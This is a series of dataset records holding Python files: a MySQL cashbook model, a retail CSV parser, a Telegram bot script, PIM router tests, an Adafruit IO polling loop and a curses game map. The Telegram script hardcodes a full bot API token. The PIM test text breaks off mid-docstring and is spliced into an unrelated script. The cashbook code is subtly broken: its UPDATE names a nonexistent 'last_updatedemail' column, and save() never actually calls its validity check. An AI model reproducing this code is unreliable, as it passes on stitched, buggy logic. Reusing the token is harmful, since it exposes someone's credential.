PRIMARY KEY (`id`),\n KEY `user_id` (`user_id`),\n KEY `summary` (`summary`)\n )\"\"\")\n con.commit()\n\n @staticmethod\n def db_cleaner():\n with DBConnector(dbName=None) as con, con.cursor() as cursor:\n cursor.execute('DROP DATABASE IF EXISTS db_%s;' % project.name())\n con.commit()\n\n @staticmethod\n def find(id):\n with DBConnector(dbName='db_%s' % project.name()) as con, \\\n con.cursor(MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"\"\"\n SELECT *\n FROM table_cashbook\n WHERE id = %s;\n \"\"\", (id,))\n results = cursor.fetchall()\n\n if (len(results) == 0):\n return None\n data = results[0]\n cb = cashbook()\n cb.attr[\"id\"] = data[\"id\"]\n cb.attr[\"user_id\"] = data[\"user_id\"]\n cb.attr[\"ym\"] = data[\"ym\"]\n cb.attr[\"date\"] = data[\"date\"]\n cb.attr[\"summary\"] = data[\"summary\"]\n cb.attr[\"detail\"] = data[\"detail\"]\n cb.attr[\"income\"] = data[\"income\"]\n cb.attr[\"expenses\"] = data[\"expenses\"]\n cb.attr[\"amount\"] = data[\"amount\"]\n cb.attr[\"last_updated\"] = data[\"last_updated\"]\n return cb\n\n def is_valid(self):\n return all([\n self.attr[\"id\"] is None or type(self.attr[\"id\"]) is int,\n self.attr[\"user_id\"] is not None and type(self.attr[\"user_id\"]) is int,\n self.attr[\"ym\"] is not None and type(self.attr[\"ym\"]) is int and len(str(self.attr[\"ym\"])) == 6,\n self.attr[\"date\"] is not None and type(self.attr[\"date\"]) is datetime.date,\n self.attr[\"summary\"] is not None and type(self.attr[\"summary\"]) is str and len(self.attr[\"summary\"]) > 0,\n self.attr[\"detail\"] is None or type(self.attr[\"detail\"]) is str,\n self.attr[\"income\"] is not None and type(self.attr[\"income\"]) is Decimal,\n self.attr[\"expenses\"] is not None and type(self.attr[\"expenses\"]) is Decimal,\n self.attr[\"amount\"] is not None and type(self.attr[\"amount\"]) is Decimal and self.attr[\"amount\"] == self.attr[\"income\"] - self.attr[\"expenses\"],\n self.attr[\"last_updated\"] is not None and type(self.attr[\"last_updated\"]) is datetime.datetime\n ])\n\n\n @staticmethod\n def build():\n now = datetime.datetime.now()\n cb = cashbook()\n # defaultが設定されている変数はdefault値にしておくと良い\n # 日付も予め値が入っていた方が良い\n # 入力が必要な物はNoneのままにしておく\n cb.attr[\"ym\"] = now.year*100 + now.month\n cb.attr[\"date\"] = now.date()\n #cb.attr[\"summary\"] = None\n #cb.attr[\"detail\"] = None\n cb.attr[\"income\"] = Decimal(0)\n cb.attr[\"expenses\"] = Decimal(0)\n cb.attr[\"amount\"] = Decimal(0)\n cb.attr[\"last_updated\"] = now\n return cb\n\n def save(self):\n if(self.is_valid):\n return self._db_save()\n return False\n\n def _db_save(self):\n if self.attr[\"id\"] == None:\n return self._db_save_insert()\n return self._db_save_update()\n\n def _db_save_insert(self):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの保存(INSERT)\n cursor.execute(\"\"\"\n INSERT INTO table_cashbook\n (user_id, ym, date, summary, detail, income, expenses, amount, last_updated)\n VALUES\n (%s, %s, %s, %s, %s, %s, %s, %s, %s); \"\"\",\n (self.attr[\"user_id\"],\n self.attr[\"ym\"],\n self.attr[\"date\"],\n self.attr[\"summary\"],\n self.attr[\"detail\"],\n self.attr[\"income\"],\n self.attr[\"expenses\"],\n self.attr[\"amount\"],\n '{0:%Y-%m-%d %H:%M:%S}'.format(self.attr[\"last_updated\"])))\n \n # INSERTされたAUTO INCREMENT値を取得\n cursor.execute(\"SELECT last_insert_id();\")\n results = cursor.fetchone()\n self.attr[\"id\"] = results[0]\n\n con.commit()\n\n return self.attr[\"id\"]\n \n def _db_save_update(self):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの保存(UPDATE)\n cursor.execute(\"\"\"\n UPDATE table_cashbook\n SET user_id = %s,\n ym = %s,\n date = %s,\n summary = %s,\n detail = %s,\n income = %s,\n expenses = %s,\n amount = %s,\n last_updatedemail = %s\n WHERE id = %s; \"\"\",\n (self.attr[\"user_id\"],\n self.attr[\"ym\"],\n self.attr[\"date\"],\n self.attr[\"summary\"],\n self.attr[\"detail\"],\n self.attr[\"income\"],\n self.attr[\"expenses\"],\n self.attr[\"amount\"],\n '{0:%Y-%m-%d %H:%M:%S}'.format(self.attr[\"last_updated\"]),\n self.attr[\"id\"]))\n con.commit()\n \n return self.attr[\"id\"]\n\n @staticmethod\n def select_by_user_id(user_id):\n with DBConnector(dbName='db_%s' % project.name()) as con, \\\n con.cursor(MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"\"\"\n SELECT *\n FROM table_cashbook\n WHERE user_id = %s;\n \"\"\", (user_id,))\n results = cursor.fetchall()\n \n records = []\n for data in results:\n cb = cashbook()\n cb.attr[\"id\"] = data[\"id\"]\n cb.attr[\"user_id\"] = data[\"user_id\"]\n cb.attr[\"ym\"] = data[\"ym\"]\n cb.attr[\"date\"] = data[\"date\"]\n cb.attr[\"summary\"] = data[\"summary\"]\n cb.attr[\"detail\"] = data[\"detail\"]\n cb.attr[\"income\"] = data[\"income\"]\n cb.attr[\"expenses\"] = data[\"expenses\"]\n cb.attr[\"amount\"] = data[\"amount\"]\n cb.attr[\"last_updated\"] = data[\"last_updated\"]\n records.append(cb)\n\n return records\n \n def delete(self):\n if self.attr[\"id\"] == None: return None\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの削除(DELETE)\n cursor.execute(\"\"\"\n DELETE FROM table_cashbook\n WHERE id = %s; \"\"\",\n (self.attr[\"id\"],))\n con.commit()\n\n return self.attr[\"id\"]\n \n @staticmethod\n def _index(user_id):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # 対応するidをリストで返す\n cursor.execute(\"\"\"\n SELECT id FROM table_cashbook\n WHERE user_id = %s; \"\"\",\n (user_id,))\n con.commit()\n recodes = cursor.fetchall()\n \n ids = [recode[0] for recode in recodes]\n return ids\n\n \n @staticmethod\n def summary(user_id, summary):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n cursor.execute(\"\"\"\n SELECT id\n FROM table_cashbook\n WHERE user_id = %s and summary = %s\n ORDER BY date ASC;\n \"\"\",(user_id,summary,))\n con.commit()\n recodes = cursor.fetchall()\n\n cb_list = [cashbook.find(recode[0]) for recode in recodes]\n return cb_list\n\n @staticmethod\n def ym(user_id, ym):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # 対応するidをリストで返す\n cursor.execute(\"\"\"\n SELECT id FROM table_cashbook\n WHERE `user_id` = %s and `ym` = %s; \"\"\",\n (user_id, ym))\n con.commit()\n recodes = cursor.fetchall()\n \n cb_list = [cashbook.find(recode[0]) for recode in recodes]\n return cb_list\n","sub_path":"app/model/cashbook.py","file_name":"cashbook.py","file_ext":"py","file_size_in_byte":9951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"584096121","text":"class StyleInfo:\n\n\tDELIMITER = ','\n\n\tdef __init__(self, csvData):\t\t\n\t\tself.StyleColor = csvData[0]\n\t\tself.USDEPTretail = csvData[1]\n\t\tself.DIV2 = csvData[2]\n\t\tself.DEL2 = csvData[3]\n\t\tself.Wxx2 = csvData[4]\n\t\tself.Wxx1 = csvData[5]\n\t\tself.Wxx = csvData[6]\n\t\tself.RETAILSALESINEUROSWxx2 = csvData[7]\n\t\tself.RETAILSALESINEUROSWxx1 = csvData[8]\n\t\tself.RETAILSALESINEUROSWxx = csvData[9]\n\t\tself.GMw1shortage = csvData[10]\n\t\tself.POS = csvData[11]\n\t\tself.OHStoreLC = csvData[12]\n\t\tself.OHWHSPLC = csvData[13]\n\t\tself.TTLOHLC = csvData[14]\n\t\tself.YEAR = csvData[15]\n\t\tself.Dateofextraction = csvData[16]\n\t\tself.Brand = csvData[17]\n\t\tself.numofStores = csvData[18]\n\t\tself.USConfDpt = csvData[19]\n\t\tself.Usdept = csvData[20]\n\t\tself.Usdeptdescription = csvData[21]\n\t\tself.Dpt = csvData[22]\n\t\tself.DIV = csvData[23]\n\t\tself.DEPT = csvData[24]\n\t\tself.AMSSN = csvData[25]\n\t\tself.Delivery = csvData[26]\n\t\tself.DEL = csvData[27]\n\t\tself.DELSSN = csvData[28]\n\t\tself.AMSTYLECLR = csvData[29]\n\t\tself.AMStyle = csvData[30]\n\t\tself.Amcolor = csvData[31]\n\t\tself.Firstdistrodate = csvData[32]\n\t\tself.FIRSTDISTRO = csvData[33]\n\t\tself.ESSENTIALREORDER = csvData[34]\n\t\tself.amp = csvData[35]\n\t\tself.FAB = csvData[36]\n\t\tself.BCBGStyle = csvData[37]\n\t\tself.BCBGColor = csvData[38]\n\t\tself.CLRDESC = csvData[39]\n\t\tself.CLS = csvData[40]\n\t\tself.STYLEDESC = csvData[41]\n\t\tself.Styledescription = csvData[42]\n\t\tself.FobCostEuro = csvData[43]\n\t\tself.LandedCostEuro = csvData[44]\n\t\tself.Retailprice = csvData[45]\n\t\tself.RetailpriceEuroArea = csvData[46]\n\t\tself.RTLOHSTR_NOTAX = csvData[47]\n\t\tself.RTLOHWHSPHYS = csvData[48]\n\t\tself.RTLOHTTL_NOTAX = csvData[49]\n\t\tself.UnitsOHStores = csvData[50]\n\t\tself.UnitsOHWhsAvailable = csvData[51]\n\t\tself.UnitsOHWhsPhysical = csvData[52]\n\t\tself.TTLUNITS = csvData[53]\n\t\tself.INSTOREAPS = csvData[54]\n\t\tself.AURSLS = csvData[55]\n\t\tself.W47 = csvData[56]\n\t\tself.W48 = csvData[57]\n\t\tself.W49 = csvData[58]\n\t\tself.W50 = csvData[59]\n\t\tself.W51 = csvData[60]\n\t\tself.W52 = csvData[61]\n\t\tself.W1 = csvData[62]\n\t\tself.W2 = csvData[63]\n\t\tself.W3 = csvData[64]\n\t\tself.WOWbuild = csvData[65]\n\t\tself.RetailSalesMTD = csvData[66]\n\t\tself.MarkdownMTD = csvData[67]\n\t\tself.UnitssalesYTD = csvData[68]\n\t\tself.RetailsalesYTD = csvData[69]\n\t\tself.SALESMD = csvData[70]\n\t\tself.MarkdownYTD = csvData[71]\n\t\tself.StoreUnitSTW3 = csvData[72]\n\t\tself.StoreUnitWOSW3 = csvData[73]\n\t\tself.YTDST = csvData[74]\n\t\tself.RetailsalesinEurosW47 = csvData[75]\n\t\tself.RetailsalesinEurosW48 = csvData[76]\n\t\tself.RetailsalesinEurosW49 = csvData[77]\n\t\tself.RetailsalesinEurosW50 = csvData[78]\n\t\tself.RetailsalesinEurosW51 = csvData[79]\n\t\tself.RetailsalesinEurosW52 = csvData[80]\n\t\tself.RetailsalesinEurosW1 = csvData[81]\n\t\tself.RetailsalesinEurosW2 = csvData[82]\n\t\tself.RetailsalesinEurosW3 = csvData[83]\n\t\tself.MarkdownInEurosW3 = csvData[84]\n\t\tself.RetailsalesinEurosW4 = csvData[85]\n\t\tself.Receiptssize2 = csvData[86]\n\t\tself.Receiptssize3 = csvData[87]\n\t\tself.Receiptssize4 = csvData[88]\n\t\tself.Receiptssize5 = csvData[89]\n\t\tself.Receiptssize6 = csvData[90]\n\t\tself.Receiptssize7 = csvData[91]\n\t\tself.Receiptssize8 = csvData[92]\n\t\tself.Receiptssize9 = csvData[93]\n\t\tself.Receiptssize10 = csvData[94]\n\t\tself.Receiptssize11 = csvData[95]\n\t\tself.Receiptssize12 = csvData[96]\n\t\tself.TOTALRECEIPTS = csvData[97]\n\t\tself.ReturnTransit = csvData[98]\n\t\tself.Shipmenttransit = csvData[99]\n\t\tself.FactorypriceEuro = csvData[100]\n\t\tself.BRAND = csvData[101]\n\t\tself.FOCUS = csvData[102]\n\t\tself.DAYEVE = csvData[103]\n\t\tself.GBB = csvData[104]\n\t\tself.SSFWMDLIST = csvData[105]\n\t\tself.x = csvData[106]\n\t\tself.x = csvData[107]\n\t\tself.x = csvData[108]\n\t\tself.SSMDLISTPP = csvData[109]\n\t\tself.MD_HARD_POS = csvData[110]\t\t\n\t\tself.MD_HARD_POS_REG = csvData[111]\n\t\tself.HARDMARK_REG = csvData[112]\n\t\tself.OLD = csvData[113]\n\t\tself.INSTORE_WHS_not_OLD = csvData[114]\n\t\tself.PE = csvData[115]\n\t\t\n\tdef reduced(self):\t\t\n\t\tsinfo = self.Brand + self.DELIMITER + self.DIV + self.DELIMITER\n\t\tsinfo += self.AMSSN + self.DELIMITER + self.Delivery + self.DELIMITER\n\t\tsinfo += self.AMStyle + self.DELIMITER + self.Amcolor + self.DELIMITER\n\t\tsinfo += self.StyleColor + self.DELIMITER + self.BCBGStyle + self.DELIMITER\n\t\tsinfo += self.BCBGColor + self.DELIMITER + self.CLRDESC + self.DELIMITER\n\t\tsinfo += self.STYLEDESC + self.DELIMITER + self.Retailprice\n\t\treturn sinfo","sub_path":"styleinfo.py","file_name":"styleinfo.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"9848587","text":"import json\nimport requests\n\n\"\"\"Запрос https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getMe\"\"\"\n# r = requests.get(URLbot + 'getMe')\n# write_json(r.json())\n\nURL = 'https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/'\n\n\ndef write_json(data, filename = 'answer.json'):\n \"\"\"Получение json данных в файл\"\"\"\n with open(filename, 'w') as f:\n json.dump(data, f, indent=2,\n ensure_ascii=False)\n\n\ndef get_updates():\n \"\"\" Запрос обновлений в чате бота https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getUpdates\"\"\"\n url = URL + 'getUpdates'\n r = requests.get(url)\n #write_json(r.json())\n return r.json()\n\n\ndef send_message(chat_id, text = 'Test'):\n \"\"\"Отправка сообщений в чат бота\"\"\"\n url = URL + 'sendMessage'\n answer = { # словарь для передачи методом post\n 'chat_id': chat_id,\n 'text': text\n }\n r = requests.post(url, json = answer)\n return r.json()\n\n\ndef main():\n \"\"\"Запрос https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getMe\"\"\"\n r = requests.get(URL + 'getMe')\n write_json(r.json())\n\nif __name__ == '__main__':\n # main()\n r = get_updates()\n # Распарсить ответ от Telegram:\n chat_id = r['result'][-1]['message']['chat']['id']\n send_message(chat_id, 'Текст')","sub_path":"testJson.py","file_name":"testJson.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"289396065","text":"'''\nCreated on Feb 9, 2016\n\n@author: alex\n'''\nimport types\nimport unittest\nimport math\n\nfrom des.entities.network_entity import NetworkEntity\nfrom des.entities.node import Node\nfrom des.event.network import NetworkEvent\nfrom pim_dm.router.router import Router\nfrom pim_dm.router.tree.downstream.interface_state import Downstream\nimport pim_dm.router.tree.downstream.state as down_sm\nimport pim_dm.router.tree.pim_assert.state as assert_sm\nfrom pim_dm.router.tree.tree_id import TreeId\nfrom pim_dm.router.tree.tree_interface import TreeInterface\nfrom pim_dm.router.tree.upstream.interface_state import Upstream\nimport pim_dm.router.tree.upstream.state as up_sm\nfrom tests.test_base import TestBase, Object\nfrom topologies import test_base_topo\n\nclass TestPIM(TestBase):\n def setUp(self):\n settings = Object()\n settings.NODES = test_base_topo.pim\n\n TestBase.setUp(self, settings=settings)\n\n self.sim_setup()\n\n def set_members(self, node: str, value: bool, time=None) -> None:\n r_t = NetworkEntity.get(node)._daemons[Router.NAME]\n\n def _set_mm():\n r_t.set_has_members(value)\n\n if time is None:\n _set_mm()\n else:\n assert isinstance(time, (int, float))\n self.schedule_action(time, _set_mm)\n\n def _get_S(self) -> Node:\n '''\n @rtype: Node\n '''\n return NetworkEntity.get('S')\n\n def _get_SG(self) -> tuple:\n '''\n @rtype: Node\n '''\n return TreeId(self._get_S(), 'g1')\n\n def _schedule_missfire(self, time: float, rname: str, sname: str, fname:\n str):\n \"\"\"\n Schedules a msg to be \"lost\" at a given time.\n This is done by replacing the function which sends the msg by _msg_missfire\n \"\"\"\n\n # so that the Join msg is not sent,\n # but the object must exist and be instantized therefore 26 secs\n def _msg_missfire():\n n_r = NetworkEntity.get(rname)._daemons[Router.NAME]\n n_t = n_r.get_tree(self._get_SG())\n sn = NetworkEntity.get(sname)\n n_sn = n_t._tree_ifs[sn]\n n_sn.rprint(\"dropping message: \" + fname)\n\n # In python methods and functions are different types.\n # The MethodType is then necessary to bind a function to a\n # object instance as to correctly pass 'self' to the function (or method)\n # http://stackoverflow.com/questions/972/adding-a-method-to-an-existing-object-instance\n setattr(n_sn, fname, types.MethodType(\n getattr(TreeInterface, fname), n_sn))\n\n def _set_missfire():\n n_r = NetworkEntity.get(rname)._daemons[Router.NAME]\n n_t = n_r.get_tree(self._get_SG())\n sn = NetworkEntity.get(sname)\n n_sn = n_t._tree_ifs[sn]\n\n setattr(n_sn, fname, _msg_missfire)\n\n self.schedule_action(time, _set_missfire)\n\n def assert_routers(self, tests) -> dict:\n \"\"\"\n performs asserts for interfaces and state machines\n\n and places entities in the returned dict in the following format\n\n entries in tests must be in either\n [ + 1 second\n\tstarttime = time.time()\n\t\n\t# prints counter to display progress of loop\n\tprint(\"\\nCount: \" + str(count))\n\tprint(\"Time: \" + str(time.time()))\n\t\n\t# receives status of signal from API, prints to terminal\n\tUnitB_status = aio.receive('status-b').value\n\tprint(\"Unit B Signal State: \" + str(UnitB_status))\n\t\n\tif count == 10:\n\t\t# creates a thread to allow the data send process to run in parallel\n\t\tdata_send_thread = threading.Thread(target = data_send)\n\t\t# starts the thread\n\t\tdata_send_thread.start()\n\t\t\n\t\t# resets count to start loop again\n\t\tcount = 0\n \n\t# increments loop\n\tcount = count + 1\n\t# sleeps process for the rest of the second\n\t# takes process time and removes it from the second, then sleeps for remaining time\n\ttime.sleep(1.0 - ((time.time() - starttime) % 60))\n","sub_path":"Other/UnitB1.py","file_name":"UnitB1.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"369376986","text":"\"\"\"\nGame map interface\n\"\"\"\nimport curses\nimport json\nimport logging\nimport random\nfrom pathlib import Path\nfrom pprint import pformat\nfrom typing import List, Set, Tuple\n\nimport constants\nimport globals\nfrom dialog import Dialog\nfrom items import Consumable, Equipment, Weapon\nfrom monster import Monster\nfrom player import Player, Position\nfrom user_interface import UserInterface\nfrom utility import color\n\n\nclass GameMap(UserInterface):\n \"\"\"\n Main User Interface to show current\n position, current map, current health,\n current power and the event log\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.event_log = None\n self.map = None\n self.status_info = None\n self.levels = list()\n self.level_width = 51\n self.level_height = 15\n self.levels = list()\n self.items = dict()\n self.monsters = dict()\n self.starting_positions = list()\n self.stories_shown = set()\n for index, file in enumerate(\n sorted(\n (Path(__file__).parent.parent / 'resources' / 'levels')\n .glob('*.level'),\n key=lambda x: int(x.stem)\n )\n ):\n with file.open() as level:\n self.levels.append(self.parse_level(level.read(), index))\n self.player = Player(Position(self.level_width, self.level_height,\n layouts=self.levels))\n self.player.position.x, self.player.position.y = \\\n self.starting_positions[0]\n self._last_position = self.current_position\n self.visited: List[Set[Tuple[int, int]]] = [set() for _ in\n range(len(self.levels))]\n self.seen: List[Set[Tuple[int, int]]] = [set() for _ in\n range(len(self.levels))]\n self.setup()\n\n @property\n def health_bar(self):\n health_bar = int(10 * (self.player.current_health\n / self.player.max_health)) * constants.HEALTH\n return health_bar\n\n @property\n def current_value(self) -> str:\n return self.levels[self.player.level][self.player.y][self.player.x]\n\n @current_value.setter\n def current_value(self, value: str):\n self.levels[self.player.level][self.player.y][self.player.x] = value\n\n @property\n def current_position(self):\n return self.player.x, self.player.y\n\n def save_game(self):\n data = {\n 'monsters': {str(key): vars(monster) for key, monster in\n self.monsters.items()},\n 'items': {str(key): vars(item) for key, item in\n self.items.items()},\n 'starting_positions': [list(position) for position in\n self.starting_positions],\n 'levels': self.levels,\n 'player_items': {\n 'head': vars(self.player.head) if self.player.head else None,\n 'chest': vars(self.player.chest)\n if self.player.chest else None,\n 'legs': vars(self.player.legs) if self.player.legs else None,\n 'feet': vars(self.player.feet) if self.player.feet else None,\n 'weapon': vars(self.player.weapon)\n if self.player.weapon else None,\n 'cookies': [vars(cookie) for cookie in self.player.cookies\n if cookie]\n },\n 'damage': self.player.damage,\n 'last_position': list(self._last_position),\n 'level': self.player.level,\n 'current_position': list(self.current_position),\n 'visited': [[list(position) for position in level] for level in\n self.visited],\n 'seen': [[list(position) for position in level] for level in\n self.seen],\n 'stories_shown': list(self.stories_shown)\n }\n with (Path(__file__).parent.parent / 'savegame.json').open(mode='w') \\\n as file:\n logging.info(pformat(data))\n json.dump(data, file, default=lambda x: vars(x))\n\n @classmethod\n def load_game(cls, filename: str):\n with (Path(__file__).parent.parent / filename).open() as file:\n data = json.load(file)\n game_map = cls()\n for position, monster_data in data['monsters'].items():\n position = tuple(int(i) for i in position[1:-1].split(', '))\n monster = Monster(1)\n monster.strength = monster_data['strength']\n monster.name = monster_data['name']\n game_map.monsters[position] = monster\n for position, item_data in data['items'].items():\n position = tuple(int(i) for i in position[1:-1].split(', '))\n item = Consumable(1) if item_data['type'] == 'Keks' \\\n else Equipment(1)\n item.name = item_data['name']\n item.factor = item_data['factor']\n item.type = item_data['type']\n game_map.items[position] = item\n game_map.starting_positions = [tuple(position) for position in\n data['starting_positions']]\n game_map.levels = data['levels']\n head = data['player_items']['head']\n chest = data['player_items']['chest']\n legs = data['player_items']['legs']\n feet = data['player_items']['feet']\n weapon = data['player_items']['weapon']\n cookies = data['player_items']['cookies']\n game_map.player.head = head if not head else Equipment(1)\n if head:\n game_map.player.head.factor = head['factor']\n game_map.player.head.name = head['name']\n game_map.player.head.type = head['type']\n game_map.player.chest = chest if not chest else Equipment(1)\n if chest:\n game_map.player.chest.factor = chest['factor']\n game_map.player.chest.name = chest['name']\n game_map.player.chest.type = chest['type']\n game_map.player.legs = legs if not legs else Equipment(1)\n if legs:\n game_map.player.legs.factor = legs['factor']\n game_map.player.legs.name = legs['name']\n game_map.player.legs.type = legs['type']\n game_map.player.feet = feet if not feet else Equipment(1)\n if feet:\n game_map.player.feet.factor = feet['factor']\n game_map.player.feet.name = feet['name']\n game_map.player.feet.type = feet['type']\n game_map.player.weapon = weapon if not weapon else Weapon(1)\n if weapon:\n game_map.player.weapon.factor = weapon['factor']\n game_map.player.weapon.name = weapon['name']\n game_map.player.weapon.type = weapon['type']\n game_map.player.cookies = list()\n for cookie_data in cookies:\n cookie = Consumable(1)\n cookie.factor = cookie_data['factor']\n cookie.name = cookie_data['name']\n cookie.type = cookie_data['type']\n game_map.player.cookies.append(cookie)\n game_map.player.position._level = data['level']\n game_map.player.damage = data['damage']\n game_map._last_position = (data['last_position'][0],\n data['last_position'][1])\n game_map.player.position._x = data['current_position'][0]\n game_map.player.position._y = data['current_position'][1]\n game_map.visited = [set(tuple(position) for position in level) for\n level in data['visited']]\n game_map.seen = [set(tuple(position) for position in level) for level\n in data['seen']]\n game_map.stories_shown = set(data['stories_shown'])\n return game_map\n\n def parse_level(self, level: str, level_number: int) -> List[List[str]]:\n level = level.replace('-', constants.HORIZONTAL)\n level = level.replace('|', constants.VERTICAL)\n level = level.replace('+', constants.CROSS)\n level = [[char for char in row]\n for row in level.split('\\n')]\n for y_index, row in enumerate(level):\n for x_index, value in enumerate(row):\n if x_index == 0 and y_index == 0:\n level[y_index][x_index] = constants.BOTTOM_RIGHT\n elif x_index == 0 and y_index == len(level) - 1:\n level[y_index][x_index] = constants.TOP_RIGHT\n elif x_index == len(row) - 1 and y_index == len(level) - 1:\n level[y_index][x_index] = constants.TOP_LEFT\n elif x_index == len(row) - 1 and y_index == 0:\n level[y_index][x_index] = constants.BOTTOM_LEFT\n elif y_index == 0 and value == constants.CROSS:\n level[y_index][x_index] = constants.TOP_OUT\n elif y_index == len(level) - 1 and value == constants.CROSS:\n level[y_index][x_index] = constants.BOTTOM_OUT\n elif x_index == 0 and value == constants.CROSS:\n level[y_index][x_index] = constants.LEFT_OUT\n elif x_index == len(row) - 1 and value == constants.CROSS:\n level[y_index][x_index] = constants.RIGHT_OUT\n if value == 'I':\n self.items[(level_number, x_index, y_index)] = \\\n random.choice((Consumable, Equipment,\n Weapon))(level_number + 1)\n elif value == 'M':\n self.monsters[(level_number, x_index, y_index)] = \\\n Monster(level_number + 1)\n elif value == '%':\n self.starting_positions.append((x_index, y_index))\n if level_number == 0:\n level[y_index][x_index] = ' '\n return level\n\n def level_value(self, x_index: int, y_index: int) -> str:\n return self.levels[self.player.level][y_index][x_index]\n\n def visit(self, x_index: int, y_index: int):\n for vertical in range(-1, 2):\n for horizontal in range(-1, 2):\n self.visited[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n self.seen[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n\n def see(self, x_index: int, y_index: int):\n for vertical in range(-1, 2):\n for horizontal in range(-1, 2):\n self.seen[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n\n def log_event(self, message):\n self.event_log.move(1, 1)\n self.event_log.deleteln()\n self.event_log.move(self.event_log.getmaxyx()[0] - 2, 1)\n self.event_log.insertln()\n self.event_log.border()\n self.event_log.addstr(self.event_log.getmaxyx()[0] - 2, 1,\n message, color(foreground=curses.COLOR_YELLOW))\n\n def setup(self):\n self.screen = curses.newwin(0, 0)\n height, width = self.screen.getmaxyx()\n self.map = curses.newwin(self.level_height, self.level_width + 1,\n 2, width // 2 - self.level_width // 2)\n map_height, _ = self.map.getmaxyx()\n self.status_info = curses.newwin(3, width - 5, map_height + 2, 3)\n self.event_log = curses.newwin(height - (map_height + 6), width - 5,\n map_height + 5, 3)\n self.status_info.border()\n self.event_log.border()\n\n def refresh(self):\n self.screen.redrawwin()\n self.map.redrawwin()\n self.status_info.redrawwin()\n self.event_log.redrawwin()\n self.screen.refresh()\n self.map.refresh()\n self.status_info.refresh()\n self.event_log.refresh()\n\n def print(self):\n \"\"\"\n print game map to window\n \"\"\"\n if self.resized:\n self.resized = False\n self.setup()\n\n self.screen.addstr(1, 3, f\"Ebene {self.player.level}\")\n self.screen.addstr(1, 20, f'Position: {self.current_position}')\n\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n for i in (-1, 1):\n if self.level_value(self.current_position[0] + i,\n self.current_position[1]) == ' ':\n self.see(self.current_position[0] + i,\n self.current_position[1])\n if self.level_value(self.current_position[0],\n self.current_position[1] + i) == ' ':\n self.see(self.current_position[0],\n self.current_position[1] + i)\n if 0 <= self.player.level < len(self.levels):\n for y_index, row in enumerate(self.levels[self.player.level]):\n for x_index, value in enumerate(row):\n if (x_index, y_index) not in self.seen[self.player.level]:\n self.map.addstr(y_index, x_index, '#',\n color(foreground=curses.COLOR_BLUE))\n elif (x_index, y_index) \\\n not in self.visited[self.player.level] \\\n and value in ('M', 'O', 'I'):\n self.map.addstr(y_index, x_index, constants.UNKNOWN,\n color(foreground=curses.COLOR_MAGENTA))\n elif value == 'I':\n self.map.addstr(y_index, x_index, constants.ITEM,\n color(foreground=curses.COLOR_CYAN))\n elif value == 'X':\n self.map.addstr(y_index, x_index, constants.SAVEPOINT,\n color(foreground=curses.COLOR_BLUE))\n elif value == '=':\n self.map.addstr(y_index, x_index, constants.LADDER_UP,\n color(foreground=curses.COLOR_GREEN))\n elif value == '%':\n self.map.addstr(y_index, x_index,\n constants.LADDER_DOWN,\n color(foreground=curses.COLOR_GREEN))\n elif value == 'M':\n self.map.addstr(y_index, x_index, constants.MONSTER,\n color(foreground=curses.COLOR_RED))\n elif value == 'O':\n self.map.addstr(y_index, x_index, constants.HOLE)\n else:\n self.map.addstr(y_index, x_index, value)\n\n self.map.addstr(self.current_position[1], self.current_position[0],\n constants.PLAYER,\n color(foreground=curses.COLOR_YELLOW))\n\n self.status_info.addstr(1, 2, \"HP: \")\n self.status_info.addstr(1, 6, 10 * ' ',\n color(foreground=curses.COLOR_RED))\n self.status_info.addstr(1, 6, self.health_bar,\n color(foreground=curses.COLOR_RED))\n\n self.status_info.addstr(1, 17,\n f'{self.player.current_health:3}/'\n f'{self.player.max_health:3}')\n self.status_info.addstr(1, 27, f\"Staerke: {self.player.strength}\")\n\n self.refresh()\n\n def handle(self, key: int, previous=None):\n self._last_position = self.current_position\n\n if self.player.current_health < 1:\n return globals.GAME_OVER\n elif key in (constants.ESCAPE, constants.SPACE):\n return globals.PAUSE\n elif key in (constants.TAB, ord('i')):\n return globals.INVENTORY\n elif key == ord('h'):\n return globals.CONTROLS_MAP\n elif key in (ord('w'), constants.UP):\n self.player.position.y -= 2\n elif key in (ord('s'), constants.DOWN):\n self.player.position.y += 2\n elif key in (ord('a'), constants.LEFT):\n self.player.position.x -= 2\n elif key in (ord('d'), constants.RIGHT):\n self.player.position.x += 2\n elif key == ord('z'):\n return globals.STORY\n\n if self._last_position != self.current_position:\n if self.current_value == 'M':\n self.visit(*self.current_position)\n return globals.MONSTER\n elif self.current_value == 'I':\n return globals.ITEM\n elif self.current_value == 'X':\n return globals.SAVE_GAME\n elif self.current_value == '=':\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n globals.LADDER.upwards = True\n return globals.LADDER\n elif self.current_value == '%':\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n globals.LADDER.upwards = False\n return globals.LADDER\n elif self.current_value == 'O':\n if 0 <= self.player.level < len(self.visited):\n self.visit(*self.current_position)\n 